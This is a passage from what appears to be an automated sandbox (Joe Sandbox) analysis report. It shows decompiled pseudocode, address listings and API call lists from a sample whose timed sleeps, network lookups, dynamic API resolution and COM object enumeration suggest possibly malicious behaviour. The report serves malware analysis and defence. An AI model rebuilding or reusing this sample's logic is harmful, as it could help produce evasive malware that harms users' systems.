										__eflags = _t159 - 1;
										if(_t159 == 1) {
											 *0x3b85ac = _t159;
										}
										L33:
										_t161 = _t326 -  *(_t329 - 0x44);
										__eflags = _t161;
										asm("sbb ecx, [ebp-0x40]");
										 *(_t329 - 0x5c) = _t323;
										if(__eflags < 0) {
											L40:
											_t326 = _t326 -  *((intOrPtr*)(_t329 - 0x30));
											__eflags = _t326;
											asm("sbb edi, [ebp-0x2c]");
											 *(_t329 - 0x5c) = _t323;
											if(__eflags < 0) {
												L47:
												_t162 = E00399890( *((intOrPtr*)(_t329 - 0x5bc)));
												__eflags = _t162;
												if(_t162 == 0) {
													L62:
													_t237 = 0;
													__eflags = 0;
													goto L63;
												}
												L48:
												_push(1);
												_push(_t329 - 0x5c0);
												_t171 = E00395A10();
												_t335 = _t335 + 8;
												__eflags = _t171;
												if(__eflags == 0) {
													goto L62;
												}
												L49:
												_t298 = _t329 - 0x5c0;
												_t172 = E00397560(_t237, __eflags, _t298);
												_t335 = _t335 + 4;
												__eflags = _t172;
												if(_t172 == 0) {
													L61:
													__eflags =  *0x3b85ac;
													if( *0x3b85ac != 0) {
														L67:
														E00391700(_t329 - 0xc);
														E0039F850(_t237, _t329 - 0x5c0);
														E0039C930(_t329 - 4);
														_t238 = 0;
														__eflags = 0;
														__eflags =  *0x3b85ac - _t238; // 0x0
														if(__eflags == 0) {
															L81:
															E00399480();
															E00397E10();
															ExitProcess(_t238);
														} else {
															L69:
															_t304 =  *0x3b8628; // 0x593938
															_t327 = 0;
															 *((intOrPtr*)(_t329 - 0x70)) = 0;
															 *((intOrPtr*)(_t329 - 0x6c)) = 0;
															 *((intOrPtr*)(_t329 - 0x68)) = 0;
															 *((intOrPtr*)(_t329 - 0x64)) = 0;
															 *(_t329 - 0x18) = 0;
															 *((intOrPtr*)(_t329 - 0xb8)) = 0x44;
															 *(_t304[0x2e])(_t329 - 0xb8);
															E00398030(_t329 - 0x18);
															_t180 = E003A1D90(0x20a, 0);
															_t239 = _t180;
															__eflags = _t239;
															if(_t239 == 0) {
																L80:
																_t306 =  *0x3b8628; // 0x593938
																 *(_t306[0x36])( *(_t329 - 0x18), _t327, _t327, _t327, _t327, _t327, _t327, _t239, _t329 - 0xb8, _t329 - 0x70);
																_t307 =  *0x3b8628; // 0x593938
																 *(_t307[0x3e])( *((intOrPtr*)(_t329 - 0x70)));
																_t308 =  *0x3b8628; // 0x593938
																 *(_t308[0x3e])( *((intOrPtr*)(_t329 - 0x6c)));
																E0039BB40( *(_t329 - 0x18));
																_t238 = 0;
																__eflags = 0;
																goto L81;
															}
															L70:
															_t309 =  *(_t329 - 0x18);
															_t328 = 0x104;
															_t324 = 0;
															__eflags = 0;
															while(1) {
																L71:
																_t131 =  &(_t328[0x1fffffbe]); // 0x7ffffffe
																__eflags = _t131;
																if(_t131 == 0) {
																	break;
																}
																L72:
																_t271 =  *_t309 & 0x0000ffff;
																__eflags = _t271;
																if(_t271 == 0) {
																	break;
																}
																L73:
																 *_t180 = _t271;
																_t180 =  &(_t180[0]);
																_t309 =  &(_t309[1]);
																_t328 = _t328 - 1;
																__eflags = _t328;
																if(_t328 != 0) {
																	continue;
																}
																L74:
																L76:
																_t180 = _t180 - 2;
																__eflags = _t180;
																_t324 = 0x8007007a;
																L77:
																 *_t180 = 0;
																__eflags = _t324;
																if(_t324 >= 0) {
																	_t189 =  *0x3b8628; // 0x593938
																	 *(_t189[0x7a])(_t239);
																}
																_t327 = 0;
																__eflags = 0;
																goto L80;
															}
															L75:
															__eflags = _t328;
															if(_t328 != 0) {
																goto L77;
															}
															goto L76;
														}
													}
													goto L62;
												}
												L50:
												__eflags =  *0x3b85ac;
												if( *0x3b85ac != 0) {
													goto L67;
												}
												L51:
												_t191 =  *0x3b8584; // 0x1
												_t326 = 0xa;
												__eflags = _t191;
												if(_t191 == 0) {
													L53:
													_t192 =  *(_t329 - 0x24);
													__eflags = _t192;
													if(_t192 <= 0) {
														while(1) {
															L55:
															_t272 =  *0x3b8584; // 0x1
															__eflags = _t272;
															if(_t272 != 0) {
																goto L57;
															}
															L56:
															_t298 =  *0x3b8628; // 0x593938
															 *(_t298[0x32])(0x4e20);
															_t326 = _t326 - 1;
															__eflags = _t326;
															if(_t326 > 0) {
																continue;
															}
															goto L57;
														}
														goto L57;
													}
													L54:
													_t196 = _t192 - 1;
													__eflags = _t196;
													 *(_t329 - 0x24) = _t196;
													_t326 = 1;
													goto L55;
												}
												L52:
												_t102 = _t326 - 5; // 0x5
												_t192 = _t102;
												 *0x3b8584 = 0;
												goto L54;
											}
											L41:
											if(__eflags > 0) {
												L43:
												_t326 = E0039F2D0(_t329 - 0x5c0);
												_t198 = E003999A0(_t237, _t329 - 0x19, _t323, _t197, _t197);
												_push(8);
												__eflags = _t198;
												if(__eflags == 0) {
													_push(_t329 - 0x9c0);
													E00399090(__eflags);
													E00399090(__eflags, _t329 - 0xdc0, 0xa);
													_push(_t329 - 0xdc0);
													_t312 = _t329 - 0x9c0;
													_push(_t312);
													_push(0xe);
													_push(_t329 - 0x5c0);
												} else {
													_push(_t329 - 0x9c0);
													E00399090(__eflags);
													E00399090(__eflags, _t329 - 0xdc0, 9);
													_t312 = _t329 - 0xdc0;
													_push(_t312);
													_push(_t329 - 0x9c0);
													_push(0xe);
													_push(_t329 - 0x5c0);
												}
												E00395A10();
												_t204 = E0039BB40(_t326);
												__imp___time64(0);
												_t335 = _t335 + 0x28;
												 *((intOrPtr*)(_t329 - 0x30)) = _t204;
												 *((intOrPtr*)(_t329 - 0x2c)) = _t312;
												goto L47;
											}
											L42:
											__eflags = _t326 - 0x7080;
											if(_t326 <= 0x7080) {
												goto L47;
											}
											goto L43;
										}
										L34:
										if(__eflags > 0) {
											L36:
											_t314 =  *0x3b857c; // 0x1
											_t210 = _t326 -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x28)) + _t314 * 8));
											__eflags = _t210;
											_t237 = _t323;
											asm("sbb ebx, [ecx+edx*8+0x4]");
											 *(_t329 - 0x5c) = _t323;
											if(__eflags < 0) {
												goto L40;
											}
											L37:
											if(__eflags > 0) {
												L39:
												 *(_t329 - 0x44) = _t326;
												 *(_t329 - 0x40) = _t323;
												_t212 = E00391FE0(_t237, _t323, _t326, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x5b8); // executed
												_t335 = _t335 + 0xc;
												__eflags = _t212;
												if(_t212 != 0) {
													L59:
													_t213 = E003A0AD0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x14)));
													__eflags = _t213;
													if(_t213 == 0) {
														goto L67;
													}
													L60:
													 *0x3b857c = 0;
													goto L62;
												}
												goto L40;
											}
											L38:
											__eflags = _t210 - 0x3840;
											if(_t210 <= 0x3840) {
												goto L40;
											}
											goto L39;
										}
										L35:
										__eflags = _t161 - 0x4b0;
										if(_t161 <= 0x4b0) {
											goto L40;
										}
										goto L36;
									}
									L28:
									_t215 = _t326 -  *((intOrPtr*)(_t329 - 0x14));
									__eflags = _t215;
									asm("sbb ecx, [ebp-0x10]");
									 *(_t329 - 0x5c) = _t323;
									if(__eflags < 0) {
										goto L33;
									}
									L29:
									if(__eflags > 0) {
										goto L31;
									}
									L30:
									__eflags = _t215 - 0xe10;
									if(_t215 <= 0xe10) {
										goto L33;
									}
									goto L31;
									L57:
									_t156 =  &(( *(_t329 - 0x48))[0]);
									 *(_t329 - 0x48) = _t156;
									__eflags = _t156 - 0x64;
								} while (_t156 < 0x64);
								goto L62;
							}
							L17:
							if(__eflags > 0) {
								L19:
								_t225 = E0039AC90( *((intOrPtr*)(_t329 - 0x5b8)), _t329 - 0x5c0); // executed
								_t335 = _t332 + 8;
								__eflags = _t225;
								if(__eflags == 0) {
									goto L63;
								}
								L20:
								 *((intOrPtr*)(_t329 - 0x3c)) = _t325;
								 *(_t329 - 0x38) = _t323;
								goto L21;
							}
							L18:
							__eflags = _t150 - 0xe10;
							if(__eflags <= 0) {
								goto L21;
							}
							goto L19;
						}
						L13:
						__eflags = _t147 - 1;
						if(__eflags != 0) {
							E0039C870(_t329 - 0x5c0, _t147);
							_t335 = _t332 + 8;
						}
						_t287 =  *0x3b8628; // 0x593938
						 *(_t287[0x32])(0x3e8);
						goto L63;
					}
					L5:
					if(__eflags > 0) {
						L7:
						_t230 = E0039D890(_t325, __eflags, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x58); // executed
						_t331 = _t331 + 0xc;
						__eflags = _t230;
						if(_t230 == 0) {
							L11:
							_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x24));
							_t289 =  *0x3b857c; // 0x1
							 *((intOrPtr*)(_t231 + _t289 * 8)) = _t325;
							_t321 =  *0x3b857c; // 0x1
							 *(_t231 + 4 + _t321 * 8) = _t323;
							goto L12;
						}
						L8:
						__eflags = _t230 - 1;
						if(_t230 != 1) {
							E0039C870(_t329 - 0x5c0, _t230);
							_t335 = _t331 + 8;
						}
						_t232 =  *0x3b8628; // 0x593938
						 *(_t232[0x32])(0x3e8);
						goto L62;
					}
					L6:
					__eflags = _t145 - 0x3840;
					if(__eflags <= 0) {
						goto L12;
					}
					goto L7;
				}
			}



































































    0x0039fee0
    0x0039fee0
    0x0039fee0
    0x0039fee3
    0x0039fef4
    0x0039fefb
    0x00000000
    0x0039fefd
    0x0039fefd
    0x0039ff0e
    0x0039ff0e
    0x003a0374
    0x003a0374
    0x003a037a
    0x003a0380
    0x003a0381
    0x003a0387
    0x003a038a
    0x0039fee0
    0x0039fee0
    0x0039fee3
    0x0039fef4
    0x0039fefb
    0x00000000
    0x0039fefd
    0x0039fefd
    0x0039ff0e
    0x0039ff0e
    0x00000000
    0x0039fefb
    0x003a0390
    0x00000000
    0x00000000
    0x00000000
    0x003a0390
    0x003a0390
    0x003a039b
    0x003a03a0
    0x003a03a5
    0x003a03ab
    0x003a03ae
    0x003a03bf
    0x003a03c4
    0x003a03c4
    0x003a03ae
    0x0039fec8
    0x0039fece
    0x0039ff15
    0x0039ff16
    0x0039ff25
    0x0039ff27
    0x0039ff2d
    0x0039ff30
    0x0039ff32
    0x0039ff32
    0x0039ff37
    0x0039ff3b
    0x0039ff3e
    0x0039ffac
    0x0039ffbb
    0x0039ffbd
    0x0039ffc2
    0x0039ffc5
    0x0039ffc7
    0x0039fff6
    0x0039ffff
    0x003a0002
    0x003a0007
    0x003a0007
    0x003a000c
    0x003a000f
    0x003a0012
    0x003a0041
    0x003a0048
    0x003a004d
    0x003a0053
    0x003a0058
    0x003a005a
    0x003a005c
    0x003a0091
    0x003a00cc
    0x003a00cd
    0x003a00db
    0x003a00e6
    0x003a00ed
    0x003a00ee
    0x003a00f0
    0x003a00f6
    0x003a0093
    0x003a0099
    0x003a009a
    0x003a00a8
    0x003a00b3
    0x003a00b4
    0x003a00ba
    0x003a00bb
    0x003a00c3
    0x003a00c3
    0x003a005e
    0x003a0064
    0x003a0065
    0x003a0073
    0x003a0078
    0x003a007e
    0x003a0085
    0x003a0086
    0x003a008e
    0x003a008e
    0x003a00f7
    0x003a00fc
    0x003a00ff
    0x003a0102
    0x003a0102
    0x003a0104
    0x003a010a
    0x003a010c
    0x003a0111
    0x003a0114
    0x003a0116
    0x003a0119
    0x003a0133
    0x003a0146
    0x003a014b
    0x003a0158
    0x003a015b
    0x003a015e
    0x003a0161
    0x003a0164
    0x003a0166
    0x003a0166
    0x003a016b
    0x003a016d
    0x003a016d
    0x003a0172
    0x003a0175
    0x003a0178
    0x003a01d3
    0x003a01d3
    0x003a01d3
    0x003a01d6
    0x003a01d9
    0x003a01dc
    0x003a028f
    0x003a0295
    0x003a029a
    0x003a029c
    0x003a0372
    0x003a0372
    0x003a0372
    0x00000000
    0x003a0372
    0x003a02a2
    0x003a02a8
    0x003a02aa
    0x003a02ab
    0x003a02b0
    0x003a02b3
    0x003a02b5
    0x00000000
    0x00000000
    0x003a02bb
    0x003a02bb
    0x003a02c2
    0x003a02c7
    0x003a02ca
    0x003a02cc
    0x003a0369
    0x003a0369
    0x003a0370
    0x003a03cc
    0x003a03cf
    0x003a03da
    0x003a03e2
    0x003a03e7
    0x003a03e7
    0x003a03e9
    0x003a03ef
    0x003a04eb
    0x003a04eb
    0x003a04f0
    0x003a04f6
    0x003a03f5
    0x003a03f5
    0x003a03f5
    0x003a03fb
    0x003a0403
    0x003a0406
    0x003a0409
    0x003a040c
    0x003a040f
    0x003a0412
    0x003a0423
    0x003a0429
    0x003a0434
    0x003a0439
    0x003a043e
    0x003a0440
    0x003a0495
    0x003a049c
    0x003a04b7
    0x003a04bc
    0x003a04c9
    0x003a04ce
    0x003a04db
    0x003a04e1
    0x003a04e9
    0x003a04e9
    0x00000000
    0x003a04e9
    0x003a0442
    0x003a0442
    0x003a0445
    0x003a044a
    0x003a044a
    0x003a0450
    0x003a0450
    0x003a0450
    0x003a0456
    0x003a0458
    0x00000000
    0x00000000
    0x003a045a
    0x003a045a
    0x003a045d
    0x003a0460
    0x00000000
    0x00000000
    0x003a0462
    0x003a0462
    0x003a0465
    0x003a0468
    0x003a046b
    0x003a046b
    0x003a046c
    0x00000000
    0x00000000
    0x003a046e
    0x003a0474
    0x003a0474
    0x003a0474
    0x003a0477
    0x003a047c
    0x003a047e
    0x003a0481
    0x003a0483
    0x003a0485
    0x003a0491
    0x003a0491
    0x003a0493
    0x003a0493
    0x00000000
    0x003a0493
    0x003a0470
    0x003a0470
    0x003a0472
    0x00000000
    0x00000000
    0x00000000
    0x003a0472
    0x003a03ef
    0x00000000
    0x003a0370
    0x003a02d2
    0x003a02d2
    0x003a02d9
    0x00000000
    0x00000000
    0x003a02df
    0x003a02df
    0x003a02e4
    0x003a02e9
    0x003a02eb
    0x003a02fc
    0x003a02fc
    0x003a02ff
    0x003a0301
    0x003a0310
    0x003a0310
    0x003a0310
    0x003a0316
    0x003a0318
    0x00000000
    0x00000000
    0x003a031a
    0x003a031a
    0x003a032b
    0x003a032d
    0x003a032e
    0x003a0330
    0x00000000
    0x00000000
    0x00000000
    0x003a0330
    0x00000000
    0x003a0310
    0x003a0303
    0x003a0303
    0x003a0303
    0x003a0304
    0x003a0307
    0x00000000
    0x003a0307
    0x003a02ed
    0x003a02ed
    0x003a02ed
    0x003a02f0
    0x00000000
    0x003a02f0
    0x003a01e2
    0x003a01e2
    0x003a01f0
    0x003a01fb
    0x003a0201
    0x003a0206
    0x003a0208
    0x003a020a
    0x003a0245
    0x003a0246
    0x003a0254
    0x003a025f
    0x003a0260
    0x003a0266
    0x003a0267
    0x003a026f
    0x003a020c
    0x003a0212
    0x003a0213
    0x003a0221
    0x003a0226
    0x003a022c
    0x003a0233
    0x003a0234
    0x003a023c
    0x003a023c
    0x003a0270
    0x003a0279
    0x003a0280
    0x003a0286
    0x003a0289
    0x003a028c
    0x00000000
    0x003a028c
    0x003a01e4
    0x003a01e4
    0x003a01ea
    0x00000000
    0x00000000
    0x00000000
    0x003a01ea
    0x003a017a
    0x003a017a
    0x003a0183
    0x003a018c
    0x003a0194
    0x003a0194
    0x003a0197
    0x003a0199
    0x003a019d
    0x003a01a0
    0x00000000
    0x00000000
    0x003a01a2
    0x003a01a2
    0x003a01ab
    0x003a01bd
    0x003a01c0
    0x003a01c3
    0x003a01c8
    0x003a01cb
    0x003a01cd
    0x003a0344
    0x003a0354
    0x003a0359
    0x003a035b
    0x00000000
    0x00000000
    0x003a035d
    0x003a035d
    0x00000000
    0x003a035d
    0x00000000
    0x003a01cd
    0x003a01a4
    0x003a01a4
    0x003a01a9
    0x00000000
    0x00000000
    0x00000000
    0x003a01a9
    0x003a017c
    0x003a017c
    0x003a0181
    0x00000000
    0x00000000
    0x00000000
    0x003a0181
    0x003a011b
    0x003a011d
    0x003a011d
    0x003a0122
    0x003a0125
    0x003a0128
    0x00000000
    0x00000000
    0x003a012a
    0x003a012a
    0x00000000
    0x00000000
    0x003a012c
    0x003a012c
    0x003a0131
    0x00000000
    0x00000000
    0x00000000
    0x003a0332
    0x003a0335
    0x003a0336
    0x003a0339
    0x003a0339
    0x00000000
    0x003a0342
    0x003a0014
    0x003a0014
    0x003a001d
    0x003a002b
    0x003a0030
    0x003a0033
    0x003a0035
    0x00000000
    0x00000000
    0x003a003b
    0x003a003b
    0x003a003e
    0x00000000
    0x003a003e
    0x003a0016
    0x003a0016
    0x003a001b
    0x00000000
    0x00000000
    0x00000000
    0x003a001b
    0x0039ffc9
    0x0039ffc9
    0x0039ffcc
    0x0039ffd6
    0x0039ffdb
    0x0039ffdb
    0x0039ffde
    0x0039ffef
    0x00000000
    0x0039ffef
    0x0039ff40
    0x0039ff40
    0x0039ff49
    0x0039ff58
    0x0039ff5d
    0x0039ff60
    0x0039ff62
    0x0039ff90
    0x0039ff96
    0x0039ff99
    0x0039ff9f
    0x0039ffa2
    0x0039ffa8
    0x00000000
    0x0039ffa8
    0x0039ff64
    0x0039ff64
    0x0039ff67
    0x0039ff71
    0x0039ff76
    0x0039ff76
    0x0039ff79
    0x0039ff89
    0x00000000
    0x0039ff89
    0x0039ff42
    0x0039ff42
    0x0039ff47
    0x00000000
    0x00000000
    0x00000000
    0x0039ff47

    APIs
    • _time64.MSVCRT ref: 0039FF16
      • Part of subcall function 0039D890: ??2@YAPAXI@Z.MSVCRT ref: 0039D8EA
      • Part of subcall function 0039D890: ??3@YAXPAX@Z.MSVCRT ref: 0039D929
      • Part of subcall function 0039D890: _time64.MSVCRT ref: 0039D94B
      • Part of subcall function 0039D890: ??3@YAXPAX@Z.MSVCRT ref: 0039D97B
      • Part of subcall function 003A1B80: ??2@YAPAXI@Z.MSVCRT ref: 003A1BAF
      • Part of subcall function 003A1B80: ??3@YAXPAX@Z.MSVCRT ref: 003A1BEE
      • Part of subcall function 003A1B80: _time64.MSVCRT ref: 003A1C10
      • Part of subcall function 003A1B80: ??3@YAXPAX@Z.MSVCRT ref: 003A1C3D
      • Part of subcall function 0039AC90: ??3@YAXPAX@Z.MSVCRT ref: 0039ACCF
      • Part of subcall function 0039AC90: ??3@YAXPAX@Z.MSVCRT ref: 0039AE7A
      • Part of subcall function 003A12C0: WSAStartup.WS2_32(00000202,?), ref: 003A12E2
      • Part of subcall function 003A12C0: gethostname.WS2_32(?,000000FF), ref: 003A1302
      • Part of subcall function 003A12C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 003A1322
      • Part of subcall function 003A12C0: freeaddrinfo.WS2_32(00000000), ref: 003A1380
      • Part of subcall function 003A12C0: WSACleanup.WS2_32 ref: 003A1386
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • _time64.MSVCRT ref: 003A0104
      • Part of subcall function 003936E0: GetFileAttributesW.KERNELBASE(?), ref: 003939AB
      • Part of subcall function 003936E0: memcpy.MSVCRT ref: 00393BC0
      • Part of subcall function 00391FE0: ??2@YAPAXI@Z.MSVCRT ref: 00392024
      • Part of subcall function 00391FE0: ??3@YAXPAX@Z.MSVCRT ref: 003920A1
      • Part of subcall function 00391FE0: _time64.MSVCRT ref: 003920D2
      • Part of subcall function 00391FE0: ??3@YAXPAX@Z.MSVCRT ref: 003920F9
      • Part of subcall function 003999A0: WSAStartup.WS2_32(00000202,?), ref: 003999CA
      • Part of subcall function 003999A0: freeaddrinfo.WS2_32(?), ref: 00399A2B
      • Part of subcall function 003999A0: getaddrinfo.WS2_32(?,00000000,?,?), ref: 00399AC6
      • Part of subcall function 003999A0: freeaddrinfo.WS2_32(?), ref: 00399B0E
      • Part of subcall function 003999A0: WSACleanup.WS2_32 ref: 00399B34
    • _time64.MSVCRT ref: 003A0280
      • Part of subcall function 003B0A40: ??2@YAPAXI@Z.MSVCRT ref: 003B0AC0
      • Part of subcall function 003B0A40: ??3@YAXPAX@Z.MSVCRT ref: 003B0B35
      • Part of subcall function 003B0A40: _time64.MSVCRT ref: 003B0B63
      • Part of subcall function 003B0A40: ??3@YAXPAX@Z.MSVCRT ref: 003B0B8B
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F90D
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F924
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F955
    • ExitProcess.KERNEL32 ref: 003A04F6
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 0039C870: _itow.MSVCRT ref: 0039C889
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003932C0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 229

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 783 3932c0-3932e7 785 3932e9-3932f1 783->785 786 3932f2-393309 783->786 788 39330f 786->788 789 393415-393432 786->789 790 393310-39335c VariantClear 788->790 789->785 797 393438-39344f 789->797 793 393362-393376 790->793 794 393407-39340c 790->794 800 393378-39337c SysFreeString 793->800 801 393382-393391 793->801 794->790 796 393412 794->796 796->789 802 3934e8-3934fc 797->802 803 393455-39349f VariantClear 797->803 800->801 804 393394-393396 801->804 809 3934df-3934e2 803->809 810 3934a1-3934b5 803->810 806 393398-3933b0 804->806 807 3933fc-393402 804->807 813 3933f2-3933f6 SysFreeString 806->813 814 3933b2-3933db call 399090 806->814 807->794 809->802 809->803 815 3934d4-3934dc 810->815 816 3934b7-3934d1 SysFreeString call 3932c0 810->816 813->807 822 3933dd-3933ed 814->822 823 3933ef 814->823 815->809 816->815 822->813 823->813
    C-Code - Quality: 69%
    			E003932C0(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				void* _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v252;
				intOrPtr* _t91;
				intOrPtr _t94;
				intOrPtr* _t95;
				intOrPtr _t98;
				intOrPtr* _t100;
				intOrPtr* _t103;
				intOrPtr* _t107;
				intOrPtr _t108;
				intOrPtr* _t110;
				intOrPtr _t112;
				intOrPtr* _t113;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t119;
				intOrPtr* _t121;
				intOrPtr _t123;
				intOrPtr* _t124;
				intOrPtr _t125;
				intOrPtr* _t126;
				intOrPtr _t134;
				intOrPtr* _t135;
				char _t138;
				intOrPtr _t150;
				intOrPtr _t156;
				intOrPtr _t163;
				intOrPtr* _t172;
				intOrPtr* _t177;
				intOrPtr _t183;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr* _t189;
				intOrPtr* _t194;

				_t189 = _a4;
				_push( &_v24);
				_push(1);
				_t138 = 0;
				_push(_t189);
				_v12 = 0;
				_v24 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *_t189 + 0x38))))() >= 0) {
					_t91 = _v24;
					_v32 = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x1c))))(_t91,  &_v32);
					_t94 = 0;
					__eflags = _v32;
					if(_v32 > 0) {
						do {
							_t177 = _v24;
							_t12 = _t94 + 1; // 0x1
							_t188 = _t12;
							_v28 = _t138;
							_v52 = 3;
							_t194 = _t194 - 0x10;
							_t118 = _t194;
							 *_t118 = _v52;
							_t156 = _t188;
							_v44 = _t156;
							 *((intOrPtr*)(_t118 + 4)) = _v48;
							 *((intOrPtr*)(_t118 + 8)) = _t156;
							 *((intOrPtr*)(_t118 + 0xc)) = _v40;
							_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t177 + 0x20))))(_t177,  &_v28);
							__imp__#9( &_v52);
							_t138 = 0;
							__eflags = _t119;
							if(_t119 >= 0) {
								_t121 = _v28;
								_v20 = 0;
								_t123 =  *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0x1c))))(_t121,  &_v20);
								__eflags = _t123;
								if(_t123 >= 0) {
									__imp__#6(_v20);
								}
								_t124 = _v28;
								_v8 = _t138;
								_t125 =  *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x50))))(_t124,  &_v8); // executed
								__eflags = _t125;
								if(_t125 >= 0) {
									_t183 =  *0x3b8628; // 0x593938
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t183 + 0x1e0))))(_v8, _a8);
									if(__eflags != 0) {
										E00399090(__eflags,  &_v252, 0x24);
										_t163 =  *0x3b8628; // 0x593938
										_t194 = _t194 + 8;
										_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 8))))(_v20,  &_v252);
										__eflags = _t134;
										if(_t134 == 0) {
											_t44 =  &_v12;
											 *_t44 = _v12 + 1;
											__eflags =  *_t44;
										} else {
											_t135 = _a4;
											 *((intOrPtr*)( *((intOrPtr*)( *_t135 + 0x3c))))(_t135, _v20, _t138);
										}
									}
									__imp__#6(_v8);
								}
								_t126 = _v28;
								 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 8))))(_t126);
							}
							_t94 = _t188;
							__eflags = _t94 - _v32;
						} while (_t94 < _v32);
						_t189 = _a4;
					}
					_t95 = _v24;
					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 8))))(_t95);
					_v16 = _t138;
					_t98 =  *((intOrPtr*)( *((intOrPtr*)( *_t189 + 0x28))))(_t189, _t138,  &_v16);
					__eflags = _t98;
					if(_t98 < 0) {
						goto L1;
					} else {
						_t100 = _v16;
						_v36 = _t138;
						 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x1c))))(_t100,  &_v36);
						_t187 = 0;
						__eflags = _v36 - _t138;
						if(_v36 > _t138) {
							do {
								_t172 = _v16;
								_a4 = _t138;
								_v52 = 3;
								_t194 = _t194 - 0x10;
								_t107 = _t194;
								 *_t107 = _v52;
								_t187 = _t187 + 1;
								_t150 = _t187;
								_v44 = _t150;
								 *((intOrPtr*)(_t107 + 4)) = _v48;
								 *((intOrPtr*)(_t107 + 8)) = _t150;
								 *((intOrPtr*)(_t107 + 0xc)) = _v40;
								_t108 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x20))))(_t172,  &_a4);
								__imp__#9( &_v52);
								_t138 = 0;
								__eflags = _t108;
								if(_t108 >= 0) {
									_t110 = _a4;
									_v8 = 0;
									_t112 =  *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x1c))))(_t110,  &_v8);
									__eflags = _t112;
									if(_t112 >= 0) {
										__imp__#6(_v8);
										_t116 = E003932C0(_a4, _a8);
										_t194 = _t194 + 8;
										_t81 =  &_v12;
										 *_t81 = _v12 + _t116;
										__eflags =  *_t81;
									}
									_t113 = _a4;
									 *((intOrPtr*)( *((intOrPtr*)( *_t113 + 8))))(_t113);
								}
								__eflags = _t187 - _v36;
							} while (_t187 < _v36);
						}
						_t103 = _v16;
						 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))(_t103);
						return _v12;
					}
				} else {
					L1:
					return 0;
				}
			}
















































    0x003932cb
    0x003932d7
    0x003932d8
    0x003932da
    0x003932dc
    0x003932dd
    0x003932e0
    0x003932e7
    0x003932f2
    0x003932f8
    0x00393302
    0x00393304
    0x00393306
    0x00393309
    0x00393310
    0x00393310
    0x00393313
    0x00393313
    0x0039331a
    0x00393322
    0x00393329
    0x0039332c
    0x0039332e
    0x00393333
    0x00393335
    0x0039333a
    0x0039333d
    0x00393347
    0x0039334a
    0x00393352
    0x00393358
    0x0039335a
    0x0039335c
    0x00393362
    0x00393368
    0x00393372
    0x00393374
    0x00393376
    0x0039337c
    0x0039337c
    0x00393382
    0x00393388
    0x00393392
    0x00393394
    0x00393396
    0x0039339e
    0x003933ae
    0x003933b0
    0x003933bb
    0x003933c3
    0x003933c9
    0x003933d7
    0x003933d9
    0x003933db
    0x003933ef
    0x003933ef
    0x003933ef
    0x003933dd
    0x003933dd
    0x003933eb
    0x003933eb
    0x003933db
    0x003933f6
    0x003933f6
    0x003933fc
    0x00393405
    0x00393405
    0x00393407
    0x00393409
    0x00393409
    0x00393412
    0x00393412
    0x00393415
    0x0039341e
    0x0039342b
    0x0039342e
    0x00393430
    0x00393432
    0x00000000
    0x00393438
    0x00393438
    0x0039343e
    0x00393448
    0x0039344a
    0x0039344c
    0x0039344f
    0x00393455
    0x00393455
    0x0039345c
    0x00393464
    0x0039346b
    0x0039346e
    0x00393470
    0x00393475
    0x00393476
    0x00393478
